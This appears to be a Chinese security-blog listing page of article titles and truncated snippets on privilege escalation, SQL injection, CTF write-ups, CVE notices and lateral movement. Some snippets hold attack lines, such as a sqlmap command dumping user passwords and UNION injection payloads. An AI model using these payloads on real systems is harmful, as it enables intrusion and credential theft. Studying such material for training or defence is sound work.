清单 vmware安卓系统镜像文件目录清单虚拟机安装自行安装ios文件安装1、新建虚拟机2、选择空白盘3、选择linux系统最高版本4、选择安装位置5、选择多个磁盘设置6、编辑虚拟机设置7、移除打印机选项8、选择并安装镜像文件9、选择镜像文件并修改内存10、安装android镜像文件11、…

还在自学黑客？一般人我劝你还是算了吧！

写在开篇笔者本人 17 年就读于一所普通的本科学校，20 年 6 月在三年经验的时候顺利通过校招实习面试进入大厂，现就职于某大厂安全联合实验室。我为啥说自学黑客（网络安全），一般人我还是劝你算了吧。因为我就是那个…

linux提权总结

linux web到rootlinux 本地到root:关于linux提权一般来说在webshell能运行的，到本地提权应该也可以运行，只要有一定的权限，一些方法在webshell上也可以运行，只是总结了一些常见的提权方法一般来说，我自己认为提权思考的…

项目管理（PMP）400题模拟真题

请点击↑关注、收藏，本博客免费为你获取精彩知识分享！有惊喜哟！！1.在完成定义范围过程后，项目经理应该使用哪项技术来生成可靠估算并管理成本和活动持续时间（1分）A.分解B.紧前关系绘图法C.挣值管…

信息安全圈都在谈论CISP，CISSP,这两者有什么区别呢？

CISP 和 CISSP 都是信息安全认证资格考试，但是它们之间有一些区别。 CISP（Certified Information Security Professional）认证考试是由国际信息系统安全认证联盟（ISC)所开发和管理的，主要考核信息安全专业人员在保障企…

Web安全之服务器端请求伪造（SSRF）类漏洞详解及预防

如何理解服务器端请求伪造（SSRF）类漏洞当服务器向用户提交的未被严格校验的URL发起请求的时候，就有可能会发生服务器端请求伪造（SSRF，即Server-Side Request Forgery）攻击。SSRF是由攻击者构造恶意请求URL&…

吊炸天的1500亿，到底有多魔性

超1500亿的数据安全规模数据安全是近几年来最热门的行业话题，数字化转型使得数据作为新型生产要素的重要性日益凸显，数据经济已成为经济发展的核心驱动力，数字经济的蓬勃催生了巨大的数据安全需求。临近春节前夕，在工信部、国…

产业安全公开课：2023年DDoS攻击趋势研判与企业防护新思路

2023年，全球数字化正在加速发展，网络安全是数字化发展的重要保障。与此同时，网络威胁日益加剧。其中，DDoS攻击作为网络安全的主要威胁之一，呈现出连年增长的态势，给企业业务稳定带来巨大挑战。2月21日&…

大咖犀利点评 | 网络安全卓越中心CPCOE论坛精彩回顾

近日，网络安全卓越中心CPCOE——圆桌论坛活动在南京召开。本次论坛邀请行业专家、知名学者等重量级嘉宾围绕“从全球到南京为何都要建设网络安全卓越中心”话题，针对网络安全卓越中心的建设理念和重要价值进行深入研讨交流。李千目：“…

黑盒测试靶机（cmcc）以及对应系统加固方案

目录一、信息收集二、进入web界面三、redis 6379连接。四、连接蚁剑成功。这是个沙箱。五、redis入手，使用密钥连接六、尝试docker越狱七、针对docker进行入侵排查从系统层面 1、检查进程 2、木马样本可以保留样本后删除，兵结束进程 …

防火墙和IDS

文章目录一、结合以下问题对当天内容进行总结1. 防火墙如何处理双通道协议？2，防火墙支持那些NAT技术，主要应用场景是什么？3. 防火墙如何处理NAT？4. 当内网PC通过公网域名解析访问内网服务器时，会存在什么问…

ToBeWritten之汽车信息安全威胁建模

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

一文搞懂SQL注入攻击

SQL注入攻击1. 前言2. SQL注入简介3. SQL注入步骤4. 防范SQL注入1. 前言随着互联网的发展和普及，网络安全问题越来越突出，网络在为用户提供越来越多服务的同时，也要面对各类越来越复杂的恶意攻击。SQL注入（SQL Injection&#x…

iis之web服务器搭建、部署（详细）~千锋

目录 Web服务器部署web服务器实验一发布一个静态网站实验二一台服务器同时发布多个web站点网站类型 Web服务器也叫网页服务或HTTP服务器web服务器使用的协议是HTTPHTTP协议端口号：TCP 80、HTTPS协议端口号：TCP 443Web服务器发布软件&…

浅谈CSRF跨域读取型漏洞之JSONP劫持

目录前提知识 CSRF JSONP jsonp漏洞原理过程复现漏洞挖掘思路漏洞防御前提知识 CSRF 提起CSRF，可能很多人都会想到修改个人资料、授权登陆等攻击场景，可以发现这两个场景都是写入型的CSRF漏洞，通常会忽视更常见的读取型的CS…

linux软件管理

软件管理 1、rpm管理工具 RPM是(Redhat Package Manager) 的缩写，由Red Hat公司提出的一种软件包管理标准 （1）rpm软件包的典型命名格式： 例：zsh-5.0.2-14.el8.x86_64.rpm zsh-50214el8x8664软件名主版本号次版本号…

宁盾目录成功对接Coremail邮箱，为其提供LDAP统一认证和双因子认证

近日，宁盾与 Coremail 完成兼容适配，在 LDAP 目录用户同步、统一身份认证及双因子认证等模块成功对接。借此机会，双方将加深在产品、解决方案等多个领域的合作，携手共建信创合作生态，打造信创 LDAP 身份目录服务新样本…

零基础小白如何自学网络安全成为顶尖黑客？

在成为黑客之前，你需要做两点准备： 1、学一门编程语言。学哪一门不重要，但你要参考一下下面的条例： C语言是Unix系统的基础。它（连同汇编语言）能让你学习对黑客非常重要的知识：内存的工作原理…

漏洞分析丨cve-2012-0003

作者:黑蛋一、漏洞简介这次漏洞属于堆溢出漏洞，他是MIDI文件中存在的堆溢出漏洞。在IE6，IE7，IE8中都存在这个漏洞。而这个漏洞是Winmm.dll中产生的。二、漏洞环境虚拟机调试工具目标软件辅助工具XP-SP3、KaliOD、IDAIE6Windbg组件gflags.exe三…

Windows权限提升—溢出提权

Windows权限提升—溢出提权1. 权限提升介绍1.1. 权限说明1.2. 权限提升后操作1.3. 权限提升的意义1.4. 权限提升整体流程1.5. 权限获取方式1.5.1. 特殊类型权限获取流程1.5.2. 普通类型权限获取流程2. 中间件语言类权限差异2.1. 常见的语言2.1.1. JSP权限2.1.2. PHP权限2.1.2.1…

虚假IP地址攻击溯源

当攻击数据包中的源IP地址是伪造的时，如何找到发送攻击数据包的真实IP地址?这一问题也被称为IP追踪(IPTraceback)。对该问题, 需要按照不同背景、情况，不同分类方法来实施溯源方法。①背景：取证人员可以控制骨干网络上的全部或大部分路由器&…

[NPUCTF2020]ezlogin (xpath盲注)

目录前提知识 xpath基本语法 xpath注入基础 [NPUCTF2020]ezlogin 信息收集 Xpath盲注前提知识 xpath基本语法表达式描述 nodename 选取此节点的所有子节点。 / 从根节点选取。 // 从匹配选择的当前节点选择文档…

【严重】Strapi ＜4.5.6 远程代码执行漏洞（POC）（CVE-2023-22621）

漏洞描述 Strapi是Node.js开发的开源内容管理系统，Users-Permission 插件的电子邮件模板系统用于管理与用户权限相关的电子邮件通知(默认启用)。 Strapi 4.5.6之前版本中，Users-Permission 插件的电子邮件模板系统存在 SSTI（服务器端模板注…

操作系统权限提升(十七)之绕过UAC提权-Windows令牌概述和令牌窃取攻击

系列文章操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权操作系统权限提升(十四)之绕过UAC提权-基于白名单AutoElevate绕过UAC提权操作系统权限提升(十五)之绕过UAC提权-基于白名单DLL劫持绕过UAC提权操作系…

安全运营 ldap监控域控信息

0x00 背景公司有多个主域，子域，有的子域因为境外数据安全的问题无法把日志传输到境内。那么如何在没有日志的情况下监控子域或者互信域的组织单元(OU)信息呢。由于访问互信域要在域控上进行，本文根据最小权限原则监控普通用户也可以访问的…

2023年疫情开放，国内程序员薪资涨了还是跌了？大数据告诉你答案

自从疫情开放，国内各个行业都开始有复苏的迹象，尤其是旅游行业更是空前暴涨，那么互联网行业如何？ 有人说今年好找工作多了，有人说依然是内卷得一塌糊涂，那么今年开春以来，各个岗位的程序员工资…

网络总结知识点（网络工程师必备）四

♥️作者：小刘在C站 ♥️个人主页：小刘主页 ♥️每天分享云计算网络运维课堂笔记，努力不一定有收获，但一定会有收获加油！一起努力，共赴美好人生！ ♥️夕阳下，是最美的绽放，树高千尺，落叶归根人生不易，人间真情目录前言 71.NAPT有什么特点？ 72.ARP欺骗解决方法

KaliLinux安装burpsuite(超详细)

注意事项 1.注意linux位数安装jdk之前先输出uname -a，看看kali linux是32位的还是64位，例如此处我的kali是32位的，因此需下载的是32位的jdk 2.jdk版本 jdk版本最好是oracle的，若使用的是openjdk很可能会出现burpsuite闪退现象…

权限提升：令牌窃取 || 进程注入.

权限提升：令牌窃取 || 进程注入. 权限提升简称提权，由于操作系统都是多用户操作系统，用户之间都有权限控制，比如通过 Web 漏洞拿到的是 Web 进程的权限，往往 Web 服务都是以一个权限很低的账号启动的，因…

全国职业院校技能大赛网络建设与运维赛项赛题(二)

全国职业院校技能大赛网络建设与运维赛题 (二)

IPsec IKE第一阶段主模式和野蛮模式

国密标准GMT 0022-2014 IPSec VPN 技术规范，IPsec IKE过程中交换类型的定义将主模式Main mode分配值为2，快速模式-quick mode分配值为32。标准中并没有提现分配值为4的交换类型。在实际应用中，IKE第一阶段经常会出现交换类型为4的情况&#x…

网络安全之黄金票据，白银票据

前言：今天来给大家讲讲黄金票据和白银票据Kerberos认证#金票Golden ticket# 原理#伪造金票的场景和所需条件#利用方式#银票SILVER TICKET# 原理#伪造银票所需条件#金票和银票的区别# 获取的权限不同#认证流程不同#加密方式不同# 前言：今天来给大家讲讲黄…

Socks5代理是一种常用的网络代理协议

代理技术在网络安全中发挥着重要的作用。其中，Socks5代理协议是一种常用的代理协议，可以为用户提供更加安全和私密的网络连接。在本文中，我们将探讨Socks5代理的原理、特点以及在网络安全中的应用。一、Socks5代理的原理 Socks5代理协议是一…

网络安全怎么学，才不会成为脚本小子？

一，怎么入门？ 1、Web 安全相关概念（2 周） 了解网络安全相关法律法规熟悉基本概念（SQL 注入、上传、XSS、CSRF、一句话木马等）。通过关键字（SQL 注入、上传、XSS、CSRF、一句话木马等&#…

ToBeWritten之固件威胁建模

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

ToBeWritten之车载信息娱乐系统 (IVI)

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

在线办公大势所趋，细说3种主流云办公方式优劣

文章目录前言在线协作：WPS优势方面部分缺点远程控制：ToDesk优势方面部分缺点云桌面：阿里云桌面优势方面部分缺点总结前言云办公会不会在未来五到十年成为普遍现象？当我们在疫情期间不得不加入远程办公行列时，其…

【喜报】通付盾获评苏州市知识产权优势型企业！

近日，苏州市第二批知识产权强企培育工程成长型、优势型、引领型企业名单公示，江苏通付盾科技有限公司获评“苏州市知识产权强企培育工程-优势型企业”。 *名单发布来源：苏州市工业和信息化局苏州市知识产权优势型企业获评优势型企业的主要…

无线WiFi安全渗透与攻防(六)之WEP破解-Gerix-wifi-cracker自动化破解WEP加密

系列文章无线WiFi安全渗透与攻防(一)之无线安全环境搭建无线WiFi安全渗透与攻防(二)之打造专属字典无线WiFi安全渗透与攻防(三)之Windows扫描wifi和破解WiFi密码无线WiFi安全渗透与攻防(四)之kismet的使用无线WiFi安全渗透与攻防(五)之aircrack-ng破解WEP加密 WEP破解-G…

DC-8通关详解

信息收集漏洞发现找个扫描器扫一下 msf试了几个exp都没用那么手动找找发现传参nid出存在sql注入 python sqlmap -u "http://192.168.45.144:80/?nid1" --union-cols1 -D d7db -T users -C name,pass --columns --tables --dump 用john爆密码 admin爆了20分钟没…

用Abp实现找回密码和密码强制过期策略

文章目录重置密码找回密码发送验证码校验验证码发送重置密码链接创建接口密码强制过期策略改写接口Vue网页端开发重置密码页面忘记密码控件密码过期提示项目地址用户找回密码，确切地说是重置密码，为了保证用户账号安全，原始密码将不再以明文…

对SQL注入进行的一些总结

简介 SQL注入作为一种攻击方式最早可以追溯到20世纪90年代中期，当时Web应用程序开始流行并广泛使用数据库作为其后端数据存储。最早的SQL注入攻击是通过简单地在Web表单输入框中输入SQL代码来实现的，攻击者可以通过修改输入参数来篡改数据库查询的行为&a…

密码模块物理攻击缓解技术GMT0084-2020

密码模块物理攻击是指攻击者通过破坏密码模块的物理结构或通过物理手段获取密码模块中的密钥信息，从而获得对密码模块的完全控制。这种攻击方式比较复杂，需要攻击者具备较高的技术水平和专业知识。密码模块物理攻击主要包括以下几个方面： 侧…

顺丰科技x腾讯安全iOA联合案例获云安全联盟CSA 2022安全革新奖

近年来，随着云计算、大数据、物联网等技术的加速创新和应用，一场数字化的变革开始席卷各行各业。远程办公、业务协同、分支互联等需求涌现，随之而来的还有更加复杂多元的高级网络攻击。在此背景下，传统的基于边界的网络安全防护理…

【高危】vm2 ＜3.9.17 沙箱逃逸漏洞（POC）（CVE-2023-30547 ）

漏洞描述 vm2 是一个基于 Node.js 的沙箱环境，可以使用列入白名单的 Node 内置模块运行不受信任的代码。由于 CVE-2023-29199 的修复不完整，vm2 3.9.17 之前版本的 transformer.js 文件中的 transformer 函数异常处理逻辑存在缺陷。攻击者可以利用这个…

ctfshow web入门代码审计 web301-305

1.web301 共有这几个文件 #checklogin.php <?php error_reporting(0); session_start(); require conn.php; $_POST[userid]!empty($_POST[userid])?$_POST[userid]:""; $_POST[userpwd]!empty($_POST[userpwd])?$_POST[userpwd]:""; $username$_PO…

Windows逆向安全（一）之基础知识（十六）

指针三通过先前指针的学习，了解了指针和地址以及数据的关系，现在结合先前的知识继续学习巩固指针遍历数组有了先前的基础，再来看看如何用指针遍历数组代码 #include "stdafx.h" void function(){short arr[5]{1,2,3,4,5};…

护网HVV（蓝队）小白必知必会

前言在HVV期间，蓝队主要就是通过安全设备看告警信息，后续进行分析研判得出结论及处置建议，在此期间要注意以下内容。内网攻击告警需格外谨慎，可能是进行内网渗透。 1.攻击IP是内网IP，攻击行为不定，主要…

【高危】Spring Boot在Cloud Foundry中部署存在路由限制绕过风险（CVE-2023-20873）

漏洞描述 Spring Boot是用于构建Java应用程序的框架，Cloud Foundry是用于部署和管理应用程序的云平台，/cloudfoundryapplication也会路由至Spring Boot actuator。当 Spring Boot 的受影响版本部署在 Cloud Foundry 上且具有处理 /cloudfoundryapplic…

网络协议与攻击模拟-06-ICMP重定向

■0网络不可达 ■2协议不可达类型4源抑制类型5重定向 2、 ICMP 常见的报文响应请求使用 ping 请求（ type 0)响应（ type 8) 目标不可达 type 3 源抑制源抑制则充当一个控制流量的角色，它通知主机减少数据报流量，由于 I…

数影周报：SpaceX设计图纸被泄露，拍明芯城正式在纳斯达克上市

本周看点：LockBit勒索软件团伙扬言泄露SpaceX设计图纸；亚马逊宣布将停止 Kindle Newsstand 服务；“拍明芯城”正式在纳斯达克上市......数据安全那些事LockBit勒索软件团伙扬言泄露SpaceX设计图纸近日，勒索软件组织LockBit给埃隆马…

2023年全国职业院校技能大赛网络建设与运维-网络运维部分

全国职业院校技能大赛网络建设与运维五、网络运维某单位网络拓扑架构如下，交换机连接两台服务器，其中Server1服务器是数字取证服务器，Server2服务器是应急响应服务器，通过交换设备相连，通过路由设备连接到安全设…

CSP-J/S初赛选择题模拟及解析

请点击↑关注、收藏，本博客免费为你获取精彩知识分享！有惊喜哟！！ 1、在8位二进制补码中，10101010表示的数是十进制下的（B） A、176 B、-86 C、-85 D、-84 答案解析：补码反码1&…

记一次企业钓鱼演练

目录 1.前言 2.环境准备 3.自*建邮*箱系*统Ewomail 3.1 安装docker 3.2 域名配置邮箱解析 3.3 docker-compose搭建 4.Gophish搭建

网络安全专业学习路线

最专业、全面的网络安全学习路线来咯~（虽然是网络安全学习路线，但重心还是在Web安全上） 展示学习路线之前，建议大家先了解一下这几个问题，既是认清形势，也是认清自我： 为什么要学网络安全&…

识破贷后资金归集——关联网络

近几年，金融机构为了扩大信贷规模，抢占市场份额，通过贷款将贷款发放给无法直接通过金融机构获得贷款的个人或者企业，但这也给金融机构带来了多重风险。首先，我们来看下资金归集是什么。所谓资金归集，是银…

协同共进 | 中睿天下入会工业信息安全产业发展联盟

近日，中睿天下加入“工业信息安全产业发展联盟”，成为新一批会员单位。工业信息安全是网络安全、国家安全的重要组成部分，涉及工业领域各个环节,涵盖工业控制系统安全、工业互联网安全、工业数据安全等各领域，直接关系到经济发展…

软考论文逐句批注

请点击↑关注、收藏，本博客免费为你获取精彩知识分享！有惊喜哟！！软考论文：项目管理论文模板及逐句批注,句子末尾处红字为批注。下面转载他人文章，仅供学习参考。然后我在去年考试的时候在参考下面文章时以M…

VMLogin：虚拟浏览器提供的那些亮眼的功能

像VMLogin这样的虚拟浏览器具有多种功能，如安全的浏览环境、可定制的设置、跨平台的兼容性、更快的浏览速度、广告拦截等等。虚拟浏览器的不同功能可以为您做什么？ 使用虚拟浏览器是浏览互联网和完成其他任务的安全方式，没有风险。您可以在…

实验二配置Trunk和链路汇聚

目录一、实验内容二、实验环境三、实验步骤一、实验内容按照拓扑图规划好网络。 1、如图设定好网络连接，分配各网段的IP地址，图中两个三层交换机开启路由功能，做路由器使用。 2、配置内网交换机S21和S22之间的Trunk和链路汇聚&#…

渗透测试工具大全

渗透测试工具大全渗透测试练习平台数据库注入练习平台用node漏洞练习平台扫描器工具端口扫描器Nmap本地网络扫描器子域名扫描器漏洞路由扫描器迷你批量信息泄漏扫描脚本Waf类型检测工具信息搜集工具社工插件Github信息搜集Repo信息搜集工具WEB工具webshell大合集渗透以及web攻击…

ctfhub技能树 web sql注入

1.整型注入页面正常时判断注入字段数 ?id1 order by 2判断注入回显位 ?id-1 union select 1,2查数据库 ?id-1 union select 1,database()库名：sqli 查数据表 ?id-1 union select 1,group_concat(table_name) from information_schema.tables where tabl…

Win32API之实现远程线程注入(九)

什么是注入注入是一种在不知情或未经许可的情况下向其他进程中注入模块并试图执行它们的技术常见的注入方式有：远程线程注入、APC注入、消息钩子注入、注册表注入、导入表注入、输入法注入等等什么是远程线程注入远程线程注入是一种技术，可以将一…

密码模块非入侵式攻击及其缓解技术GMT0083-2020

密码模块非入侵式攻击，是一种攻击方式，在这种攻击中，攻击者不会直接访问受攻击者的密码模块。相反，攻击者会利用其他途径获得用户的凭证，然后使用这些凭证去访问密码模块。这种攻击通常使用钓鱼邮件、社交工程等技巧&a…

hjr-谈一下自动驾驶汽车网络和数据安全

分类其实我觉得自动驾驶汽车的安全分为两种， 一种是行驶的车是否出车祸的安全，这种主要考验自动驾驶的算法和能力另一种是传统服务器终端安全，这种主要是传统的网络安全和数据安全传统的网络和数据安全保障方式建立完善的安全策略和规…

内网安全——域控提权-CVE-2020-1472NTLM中继攻击

目录（一）横向移动-域控提权-CVE-2020-1472 0x01 漏洞原理 0x02 利用过程重置密码: 恢复密码:

内网渗透(四十四)之横向移动篇-DCOM远程执行命令横向移动

系列文章第一章节之基础知识篇内网渗透(一)之基础知识-内网渗透介绍和概述内网渗透(二)之基础知识-工作组介绍内网渗透(三)之基础知识-域环境的介绍和优点内网渗透(四)之基础知识-搭建域环境内网渗透(五)之基础知识-Active Directory活动目录介绍和使用内网渗透(六)之基…

计算机网络安全基础知识1：渗透测试，网络连接的核心TCP/IP体系结构，公网，内网，ip地址和端口

计算机网络安全基础知识1：渗透测试，网络连接的核心TCP/IP体系结构，公网，内网，ip地址和端口 2022找工作是学历、能力和运气的超强结合体，遇到寒冬，大厂不招人，可能很多算法学生都得去…

【技巧分享】Nacos未经授权的登录漏洞-任意密码直接登录后台

文章目录前言一、nacos简介二、漏洞复现总结前言碰到个很有意思的系统，Nacos。通过查找资料，发现Nacos < 2.1.0 版本都存在这个漏洞。漏洞描述：Nacos中发现影响Nacos < 2.1.0的问题，Nacos用户使用默认JWT密钥导致未授…

内网渗透-基础环境

解决依赖，scope安装打开要给cmd powershell 打开远程 Set-ExecutionPolicy RemoteSigned -scope CurrentUser; 我试了好多装这东西还是得科学上网，不然不好用 iwr -useb get.scoop.sh | iex 查看下载过的软件安装sudo 安装git 这里一定要配置bu…

AI+人类，实现高效网络安全

导语聊天机器人和生成式人工智能（如 ChatGPT）突然成为主流让很多人感到担忧。很多人开始担忧，人工智能取代人的时代已经到来。幸运的是，事实并非如此。更有可能的情况是，人类将与 AI 合作创建工作角色的混合模型。…

Cobalt Strike---（2）

数据管理 Cobalt Strike 的团队服务器是行动期间Cobalt Strike 收集的所有信息的中间商。Cobalt Strike 解析来自它的 Beacon payload 的输出，提取出目标、服务和凭据。如果你想导出 Cobalt Strike 的数据，通过 Reporting → Export Data 。Cobalt Str…

dc-6靶机

1.使用nmap进行信息搜集，存活主机，端口 192.168.85.184是存活主机，发现开放22，80端口 2.访问192.168.85.184的80端口发现被重定向了，修改hosts文件 vim /etc/hosts 添加一行 192.168.85.174 wordy3.对网站进行信息搜…

权限提升：烂土豆 || DLL 劫持.

权限提升：烂土豆 || DLL 劫持. 权限提升简称提权，由于操作系统都是多用户操作系统，用户之间都有权限控制，比如通过 Web 漏洞拿到的是 Web 进程的权限，往往 Web 服务都是以一个权限很低的账号启动的，因此通…

零基础小白看什么书或是掌握什么技能才可以踏进网络安全的大门？

大家好，经常会遇到有人会去问这个问题，而对于刚入门安全的同学来说也确实是一个避不开的话题。这说这个话题之前，我们尝试来解析这个问题的目的： 1、知识面扩展：获取最新的安全资讯，了解圈内、行业内的动…

信息安全面试：安全基础---前篇.

信息安全面试：安全基础. 目录： HTTPS 的实现原理： 3389 无法连接的几种情况： ARP 欺骗原理： ARP 欺骗防护： CIA三元组： syn 洪流的原理：： 什么是同源策略&#x…

警惕免杀版Gh0st木马！

https://github.com/SecurityNo1/Gh0st2023 经过调查发现，这款开源的高度免杀版Gh0st木马目前正在大范围传播，据称可免杀多种主流杀软：开发者不仅制作了新颖的下载页面，还设法增加了搜索引擎的收录权重，吸引了许多免…

2023年2月573名学员通过国家信息安全水平考试其中CISP218名，NISP二级355名

北京PER20230217HEBAN3 考试时间：2023年02月17日地点：北京王佳俊、王后月、程鹏、王海洋、牛麒盛、张飞、禹晓瑞、李鹏卫、柳位世、李霖、刘志超、刘峰、张广军、刘鑫博、王琳、翟栋、刘高军、康寅哲、夏中玲、冯光豪、程岩辉、白玉强、遆盼明、李淼…

反调试与反反调试

参考文本 (190条消息) C 反反调试（NtQueryInformationProcess）_(-: LYSM :-)的博客-CSDN博客 Windows 平台反调试相关的技术方法总结—part 2 - 先知社区 C/C MinHook 库的使用技巧 - lyshark - 博客园 (cnblogs.com) (177条消息) C 反反调试&#x…

内网渗透之横向移动委派-非约束委派约束委派资源委派

0x01 横向移动-非约束委派原理： 机器A（域控）访问具有非约束委派权限的机器B的服务，会把当前认证用户（域管用户）的的TGT放在ST票据中，一起发送给机器B，机器B会把TGT存储在lsass进程…

网络协议与攻击模拟-07-TCP连接-三次握手

传输层协议 1.TCP 2.UDP TCP 协议回顾内容 1．传输层功能：定义应用层协议数据报文的端口号，流量控制 2．对原始数据进行分段处理传输层所提供服务 1．传输连接服务 2．数据传输服务：流量控制…

顶级白帽黑客必备的十大黑客技术

1.熟悉Linux系统和命令行操作： Linux是黑客的基石，几乎所有黑客工具和技术都是在Linux平台上运行的，熟悉Linux系统和命令行操作是必须的。 2.掌握网络协议和TCP/IP模型： 了解TCP/IP模型、网络协议和通信流程是黑客攻击的基础&a…

密码学：分组密码.（块密码：是一种对称密码算法）

密码学：分组密码. 分组加密(Block Cipher) 又称为分块加密或块密码，是一种对称密码算法，这类算法将明文分成多个等长的块 (Block) ，使用确定的算法和对称密钥对每组分别加密或解密。分组加密是极其重要的加密体制，如D…

Vite 的安装和基本使用

注意：Vite 本身也是依赖 Node.js 的，所以也需要安装好 Node 环境，并且 Vite 要求 Node 的版本要大于等于 12 版本。下面，我们不会按照 Vite 官方文档中那样直接用 Vite 的脚手架搭建出一个完整的项目（npm init vitela…

sqli-labs通关（十七）

第十七关这一关跟前面的关卡都不一样，是全新的关卡，页面是一个密码重置页面，需要输入用户名，然后输入新的密码，就会把我们的旧密码替换掉。所以就会用到数据库的update更新数据，不再是前面的查询数据&…

Kali-linux设置ProxyChains

ProxyChains是Linux和其他Unices下的代理工具。它可以使任何程序通过代理上网，允许TCP和DNS通过代理隧道，支持HTTP、SOCKS4和SOCKS5类型的代理服务器，并且可配置多个代理。ProxyChains通过一个用户定义的代理列表强制连接指定的应用程序&…

gitea安装

安装git 建议编译源码安装 tar -xvf git-2.44.0.tar.gz cd git-2.44.0 make prefix/usr/local/git all make prefix/usr/local/git install git --verision 复制代码创建 git 组和用户 groupadd git useradd git -g git -s /bin/false 复制代码下载 gitea 二进制文件&am…

windows安装Anaconda

Anacond是什么？ 和Python有啥关系？ 1、Anacond 是一个python的发行版，包括了python和很多常见的软件库, 和一个包管理器conda。常见的科学计算类的库都包含在里面了，使得安装比常规python安装要容易。 2、Anaconda是专注于数据分…

为什么我说自学黑客（网络安全），一般人还是算了吧！

一、自学网络安全学习的误区和陷阱 1.不要试图先成为一名程序员（以编程为基础的学习）再开始学习我在之前的回答中，我都一再强调不要以编程为基础再开始学习网络安全，一般来说，学习编程不但学习周期长，而…

记录一次Windows7操作系统渗透测试

#本文档仅用于实验，请勿用来使用恶意攻击！ 《中华人民共和国网络安全法》中，恶意破坏计算机信息系统罪在第二十七条被明确规定，规定内容为： 第二十七条　任何单位和个人不得为达到破坏计算机信息系统安全的目的&#x…

安全工程师必读 ——《安全技术工具扫盲》

安全技术 SAST - 静态应用安全测试（白盒检测）DAST - 动态应用安全测试（黑盒检测）IAST - 交互式应用安全测试（灰盒检测）RASP - 运行时应用自我保护Dependency Scanning（依赖项安全扫描&#xff…

Ctfshow [单身杯]

文章目录 web签到easyPHPescapeshellcmdescapeshellargsedawk 姻缘测试 web签到 <?php # -*- coding: utf-8 -*- # Author: h1xa # Date: 2022-03-19 12:10:55 # Last Modified by: h1xa # Last Modified time: 2022-03-19 13:27:18 # email: h1xactfer.com # link: h…

我的服务器被挖矿了，原因竟是。。。

「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「推荐专栏」：对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》挖矿木马应急响应一、什么是挖矿二、被挖矿主机现象三、挖矿木马处置思路1）隔…

SSL网关国密标准GMT0024-2014

SSL网关是基于SSL/TLS 协议，在通信网络中构建安全通道的设备。SSL网关国密标准包括： （1）GMT0024-2014 SSL V*N技术规范（密码产品类） （2）GMT0025-2014 SSL V*N网关产品规范 &#xff…

Vulnhub:Digitalworld.local (Mercy v2)靶机

kali：192.168.111.111 靶机：192.168.111.130 信息收集端口扫描 nmap -A -v -sV -T5 -p- --scripthttp-enum 192.168.111.130 使用enum4linux对目标smb服务进行枚举 enum4linux -a 192.168.111.130 目标文件共享的目录目标存在的用户 8080端口的网…

ToBeWritten之杂项

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

小白学网络安全要学些什么？

一.网络安全学些什么呢？ 虽然网上已经有非常多的学习路线了，但是仍然有很多零基础的小白还是不懂网络安全到底应该要怎么去学习，我也经常会在后台收到这样的问题“我想学网络安全，需要先学编程语言吗？”、“学渗透就业…

我学习网络安全的心得

我的学习心得，我认为能不能自学成功的要素有两点。第一点就是自身的问题，虽然想要转行学习安全的人很多，但是非常强烈的想要转行学好的人是小部分。而大部分人只是抱着试试的心态来学习安全，这是完全不可能的。所以能不能学成并…

项目管理（PMP）考试：易混淆知识点汇总

请点击↑关注、收藏，本博客免费为你获取精彩知识分享！有惊喜哟！！ PMP考试中经常出现，但容易混淆的一些内容，包含15个会议、40个分析、6个矩阵、5个清单、5个审计、5个报告、4个分解结构、4个评估、3个日志…

[长安杯 2021学生组]baigei

Index前言介绍漏洞利用思路利用过程一.编写交互函数二.填充Tcache Bin三.释放Tcache Bin四.获取Libc地址五.Tcache Bin Attack六.完整EXP：前言最近有点迷茫，开始放松自己了。心态还不是很对，需要继续调整。介绍本题是一题经典的堆题&a…

ctfshow web入门命令执行web74-118

1.web74 还是先扫目录 payload: c$anew DirectoryIterator(glob:///*);foreach($a as $f){echo($f->__toString()." ");}exit(0); #扫描根目录有什么文件 c$anew DirectoryIterator(glob:///*);foreach($a as $f){echo($f->getFilename()." ");} …

ToBeWritten之局域互联网协议

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

ATTCK v12版本战术实战研究——提权(一）

一、概述前几期文章中，我们中介绍ATT&CK 14项战术中提权战术（一），包括提权前6项子技术。那么从前文中介绍的相关提权技术来开展测试，进行更深一步的分析。本文主要内容是介绍攻击者在运用提权技术时，…

web漏洞-web文件操作之文件下载与文件读取超详细全解

目录一、导图二、引入三、简单实验四、真实案例（禁止进行非法操作） 五、RoarCTF文件读取真复现六、百度杯Zone真题复现七、小米路由器-文件读取漏洞真实测试一、导图二、引入文件被解析——>文件包含漏洞显示源代码——>文件读取漏…

CVE漏洞复现-CVE-2022-22947-Spring Cloud Gateway RCE

CVE-2022-22947-Spring Cloud Gateway RCE 基本介绍微服务架构与Spring Cloud 最开始时，我们开发java项目时，所有的代码都在一个工程里，我们把它称为单体架构。当我们的项目的代码量越来越大时，开发的成员越来越多时&#xff…

Nodejs vm/vm2沙箱逃逸

文章目录什么是沙箱以及VM？vm模块nodejs作用域vm沙箱vm沙箱逃逸vm2例题分析：（待补充）[HFCTF2020]JustEscape[HZNUCTF 2023 final]eznode參考文章:什么是沙箱以及VM？ 什么是沙箱： 沙箱就是能够像一个集装箱…

这才是网络安全最系统的学习路线（建议收藏）

01 什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面…

黑客必备工具：Hydra的完整安装和使用指南

